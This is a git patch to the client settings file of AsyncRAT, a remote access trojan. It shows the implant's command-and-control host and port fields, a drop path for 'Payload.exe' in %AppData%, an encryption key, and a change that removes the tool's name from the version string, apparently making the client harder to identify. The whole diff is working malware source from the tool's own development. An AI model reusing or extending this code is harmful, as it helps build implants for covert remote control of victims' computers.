From 4c57aafc211120fe2b302d5f93eaea2eda3c26df Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Mon, 27 May 2019 05:22:36 +0300 Subject: [PATCH] Update Settings.cs --- AsyncRAT-C#/Client/Settings.cs | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index e12d780..1b57618 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -12,7 +12,7 @@ namespace Client #if DEBUG public static string Ports = "6606"; public static string Hosts = "127.0.0.1"; - public static string Version = "AsyncRAT 0.4.9D"; + public static string Version = "0.4.9D"; public static string Install = "false"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); public static string Key = "NYAN CAT"; @@ -28,7 +28,7 @@ namespace Client #else public static string Ports = "%Ports%"; public static string Hosts = "%Hosts%"; - public static string Version = "AsyncRAT 0.4.9D"; + public static string Version = "0.4.9D"; public static string Install = "%Install%"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%"); public static string Key = "%Key%";